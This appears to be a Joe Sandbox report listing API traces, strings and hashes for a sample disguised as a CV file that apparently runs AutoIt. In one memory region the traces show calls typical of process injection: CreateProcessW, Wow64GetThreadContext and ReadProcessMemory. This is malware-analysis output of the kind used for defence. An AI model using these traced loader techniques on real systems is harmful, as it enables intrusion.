                                                                                        • Instruction Fuzzy Hash: E1A11570E0020DEBDB14CFA4C898FEEBBB5BF48315F208559E605BB280D7759A40CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1131 3849fb-384a25 call 38bcce RegOpenKeyExW 1134 3f41cc-3f41e3 RegQueryValueExW 1131->1134 1135 384a2b-384a2f 1131->1135 1136 3f4246-3f424f RegCloseKey 1134->1136 1137 3f41e5-3f4222 call 39f4ea call 3847b7 RegQueryValueExW 1134->1137 1142 3f423d-3f4245 call 3847e2 1137->1142 1143 3f4224-3f423b call 386a63 1137->1143 1142->1136 1143->1142
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00384A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003F41DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003F421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003F4249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249
                                                                                        • Opcode ID: 8f18f92e09fc58f819a5689b0d707cfde740304101923e6dea0ccd3c5e565c4b
                                                                                        • Instruction ID: 2ef19eb08fd07027444170b8ce9c8a4c4d000a694f34d8569834db00da13d7c8
                                                                                        • Opcode Fuzzy Hash: 8f18f92e09fc58f819a5689b0d707cfde740304101923e6dea0ccd3c5e565c4b
                                                                                        • Instruction Fuzzy Hash: 0F114FB1A00209BFEB05AFA4CD86EFF7BBCEF04744F104465B506E6191EA709E45D754

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1158 3836b8-383728 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003836E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 0038371B
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 00383724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 3b080d01022619103221fa30741fd09a5820777bcec8d801d2c93d866d55a6f7
                                                                                        • Instruction ID: f3b437d2d59d38f71e9825f48c3bcc3b5e0d6e007212ae749cd7f39e4958d335
                                                                                        • Opcode Fuzzy Hash: 3b080d01022619103221fa30741fd09a5820777bcec8d801d2c93d866d55a6f7
                                                                                        • Instruction Fuzzy Hash: 6AF0DA799802D07AE7315797AC48E672E7DDBC7F60B00402BBA04A25B0C66508D5DAB9

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1263 19fc3a8-19fc4fe call 19f9ff8 call 19fc298 CreateFileW 1270 19fc505-19fc515 1263->1270 1271 19fc500 1263->1271 1274 19fc51c-19fc536 VirtualAlloc 1270->1274 1275 19fc517 1270->1275 1272 19fc5b5-19fc5ba 1271->1272 1276 19fc53a-19fc551 ReadFile 1274->1276 1277 19fc538 1274->1277 1275->1272 1278 19fc555-19fc58f call 19fc2d8 call 19fb298 1276->1278 1279 19fc553 1276->1279 1277->1272 1284 19fc5ab-19fc5b3 ExitProcess 1278->1284 1285 19fc591-19fc5a6 call 19fc328 1278->1285 1279->1272 1284->1272 1285->1284
                                                                                        APIs
                                                                                          • Part of subcall function 019FC298: Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 019FC4F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: S9QGZGQ44JJHI9OSVB2OTAPRKK0QL
                                                                                        • API String ID: 2694422964-3866275458
                                                                                        • Opcode ID: c38dc96513b130cfe1ca0ee478eee48645807ec80440567d5d1d073cc8f2e332
                                                                                        • Instruction ID: 9b835e0c802facea1620db7b792657759d7c5268dfc0dd269ca9cba703787442
                                                                                        • Opcode Fuzzy Hash: c38dc96513b130cfe1ca0ee478eee48645807ec80440567d5d1d073cc8f2e332
                                                                                        • Instruction Fuzzy Hash: 0C618430D0828CEAEF11D7F8C848BEEBB75AF15304F048599E6497B2C1D7B91A49CB65

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00385374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00441148,?,003861FF,?,00000000,00000001,00000000), ref: 00385392
                                                                                          • Part of subcall function 003849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00384A1D
                                                                                        • _wcscat.LIBCMT ref: 003F2D80
                                                                                        • _wcscat.LIBCMT ref: 003F2DB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: 8!D$\$\Include\
                                                                                        • API String ID: 3592542968-342886951
                                                                                        • Opcode ID: cf2f25679fbb50cf7d6c292b66dba7a1f336d03ded5bdfc720d3544d1b2a44dd
                                                                                        • Instruction ID: fd534b37f9e89074e08d8949fe0ceaab52ab684eeeb9991acdc70f0df9f4ce1b
                                                                                        • Opcode Fuzzy Hash: cf2f25679fbb50cf7d6c292b66dba7a1f336d03ded5bdfc720d3544d1b2a44dd
                                                                                        • Instruction Fuzzy Hash: 1151A7794043408FC706EF55DA828ABB3F8FF5A300B80457EF64497261EBB49544CB5A
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0038522F
                                                                                        • _wcscpy.LIBCMT ref: 00385283
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00385293
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003F3CB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 1053898822-1585850449
                                                                                        • Opcode ID: 8f42cf81339608558aa521891f88933e29c84a2d5bd4f981a5f8d030894fc703
                                                                                        • Instruction ID: ed569cdad507e6247f3eab9653aac2c07eb647cb4238d625ae5e1aa6dd299c21
                                                                                        • Opcode Fuzzy Hash: 8f42cf81339608558aa521891f88933e29c84a2d5bd4f981a5f8d030894fc703
                                                                                        • Instruction Fuzzy Hash: 7431F171008740AFD726FB60DC46FDEB7D8AF45310F00496EF585960A1EB74A688CB9A
                                                                                        APIs
                                                                                          • Part of subcall function 003841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003839FE,?,00000001), ref: 003841DB
                                                                                        • _free.LIBCMT ref: 003F36B7
                                                                                        • _free.LIBCMT ref: 003F36FE
                                                                                          • Part of subcall function 0038C833: __wsplitpath.LIBCMT ref: 0038C93E
                                                                                          • Part of subcall function 0038C833: _wcscpy.LIBCMT ref: 0038C953
                                                                                          • Part of subcall function 0038C833: _wcscat.LIBCMT ref: 0038C968
                                                                                          • Part of subcall function 0038C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0038C978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        • Opcode ID: 99bef473f58c6c591be5b6fed98cc62b36a2ad1ebab591747bd5d3663a1f4a21
                                                                                        • Instruction ID: 36c723c76b9409c7231d50b6585bec42f77e27c8072b7d949abdacdfb4c6f877
                                                                                        • Opcode Fuzzy Hash: 99bef473f58c6c591be5b6fed98cc62b36a2ad1ebab591747bd5d3663a1f4a21
                                                                                        • Instruction Fuzzy Hash: DD914D71910219AFCF06EFA4CC919FEB7B4BF19310F10446AF916EB291DB34AA45CB90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003F3725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 003F376F
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                          • Part of subcall function 003840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003840C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X$t3C
                                                                                        • API String ID: 3777226403-2841116392
                                                                                        • Opcode ID: c7086f83e119d8c70f93f6dbd41c2735006bffc6327f056a70669cebbce762e8
                                                                                        • Instruction ID: ce8c3d028eab9a229ef40c01aecdfc8fa0a4320c20f2d98529fdb62a74d181f0
                                                                                        • Opcode Fuzzy Hash: c7086f83e119d8c70f93f6dbd41c2735006bffc6327f056a70669cebbce762e8
                                                                                        • Instruction Fuzzy Hash: 1921A871A102989FCB02EFD4C8457EE7BFC9F49304F10805AE505AB241DBB89A898F65
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 003A34FE
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 003A3539
                                                                                        • __wopenfile.LIBCMT ref: 003A3549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        • Opcode ID: 57818ee954a8f25d47224c2de040fc14617f9d8a1fddb35958c1f9c4e494aa48
                                                                                        • Instruction ID: a03a5773d921ca0a4413df6842752cdf8fcd494c971a35c0dafd5c53ed7f81ed
                                                                                        • Opcode Fuzzy Hash: 57818ee954a8f25d47224c2de040fc14617f9d8a1fddb35958c1f9c4e494aa48
                                                                                        • Instruction Fuzzy Hash: 57110670E003069FDB13BF759C4266E76A8EF4B360B1A8925F815CF281EB34CA1197A1
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0039D28B,SwapMouseButtons,00000004,?), ref: 0039D2BC
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0039D28B,SwapMouseButtons,00000004,?,?,?,?,0039C865), ref: 0039D2DD
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,0039D28B,SwapMouseButtons,00000004,?,?,?,?,0039C865), ref: 0039D2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 21fa4614e57f62ee5f010e71d16c5cac838c2781b151e7dce7a5d0f603f6b7c2
                                                                                        • Instruction ID: 94ff97d00000024f2ccbf78b299e0156f9e94a57cce83a85252530edbfa99b84
                                                                                        • Opcode Fuzzy Hash: 21fa4614e57f62ee5f010e71d16c5cac838c2781b151e7dce7a5d0f603f6b7c2
                                                                                        • Instruction Fuzzy Hash: 14117979A11208BFDF228FA8DC85EAF7BBCEF04744F004829E805E7110E731AE449B64
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 019FBA53
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 019FBAE9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019FBB0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                        • Instruction ID: ea35f7dc42210c5ad3a62c7d960dd2d708e419391faff05ca4553ed500cadc86
                                                                                        • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                        • Instruction Fuzzy Hash: 86620B70A14218DBEB24DFA4C840BDEB776EF58301F1091A9D20DEB390E7759E85CB59
                                                                                        APIs
                                                                                          • Part of subcall function 00384517: _fseek.LIBCMT ref: 0038452F
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC65D
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC670
                                                                                        • _free.LIBCMT ref: 003CC4DD
                                                                                        • _free.LIBCMT ref: 003CC4E4
                                                                                        • _free.LIBCMT ref: 003CC54F
                                                                                          • Part of subcall function 003A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003A7A85), ref: 003A1CB1
                                                                                          • Part of subcall function 003A1C9D: GetLastError.KERNEL32(00000000,?,003A7A85), ref: 003A1CC3
                                                                                        • _free.LIBCMT ref: 003CC557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                        • Instruction ID: 8c99bb708a990126aec91a4fc97143bd57640a9c4893ce583a535f4305e703c6
                                                                                        • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                        • Instruction Fuzzy Hash: 69514BB1904219AFDF169F65DC81BAEBBB9EF49310F1040AEF219E7241DB715E808F58
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0039EBB2
                                                                                          • Part of subcall function 003851AF: _memset.LIBCMT ref: 0038522F
                                                                                          • Part of subcall function 003851AF: _wcscpy.LIBCMT ref: 00385283
                                                                                          • Part of subcall function 003851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00385293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0039EC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039EC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003F3C88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 9f8fd00677377612e4b11c9e71375ea7d54f9798e2f2a655b2c49ea42ea884ab
                                                                                        • Instruction ID: b429f07c91e78105cc713ed3ce52e1060bf64eebbc42b158aa3d54552947ea63
                                                                                        • Opcode Fuzzy Hash: 9f8fd00677377612e4b11c9e71375ea7d54f9798e2f2a655b2c49ea42ea884ab
                                                                                        • Instruction Fuzzy Hash: 3B21D474904784AFEB33DB68C859BE7BFEC9B01308F05049DE68E67282C3746A848B51
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 003CC72F
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003CC746
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: e4a276316064a3d9ce343dd9c0296ee5b586aed19153b466a6c8f42944c4ae34
                                                                                        • Instruction ID: 9043e2b6b43520536c18a4bccdc354cbed66883d9109b9c87404088ac5bbcc54
                                                                                        • Opcode Fuzzy Hash: e4a276316064a3d9ce343dd9c0296ee5b586aed19153b466a6c8f42944c4ae34
                                                                                        • Instruction Fuzzy Hash: F5D05E7190030EABDB10AB90DD0EF8A776C9B04704F0001A17650A50B1DAB4E6998B59
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af16c737b29f3cc76d9d97123809ec678ef192218ac28bb69efe988d5bf2eb57
                                                                                        • Instruction ID: d1fac7cb59116db53849cd8df14f31f115bc4fbf5f1582afc2d222f5476a6fdf
                                                                                        • Opcode Fuzzy Hash: af16c737b29f3cc76d9d97123809ec678ef192218ac28bb69efe988d5bf2eb57
                                                                                        • Instruction Fuzzy Hash: 95F15A726083019FCB11DF24D881B6AB7E5BF88314F14896EF9969B392D770E945CF82
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00385022
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003850CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell__memset
                                                                                        • String ID:
                                                                                        • API String ID: 928536360-0
                                                                                        • Opcode ID: 8b028a9a03a014d219e4d95bc5d98ed615be363d908a983d67e8d4c6fd4e2bfb
                                                                                        • Instruction ID: 3563d6421fd0cf244a20f9e1b9ade279bc3dac9c282df03bcecba460c308cc4e
                                                                                        • Opcode Fuzzy Hash: 8b028a9a03a014d219e4d95bc5d98ed615be363d908a983d67e8d4c6fd4e2bfb
                                                                                        • Instruction Fuzzy Hash: EE31C1B0504701CFC722EF64D84469BBBE8FF49308F00093EF69A87251E771A988CB96
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A81C2: __NMSG_WRITE.LIBCMT ref: 003A81E9
                                                                                          • Part of subcall function 003A81C2: __NMSG_WRITE.LIBCMT ref: 003A81F3
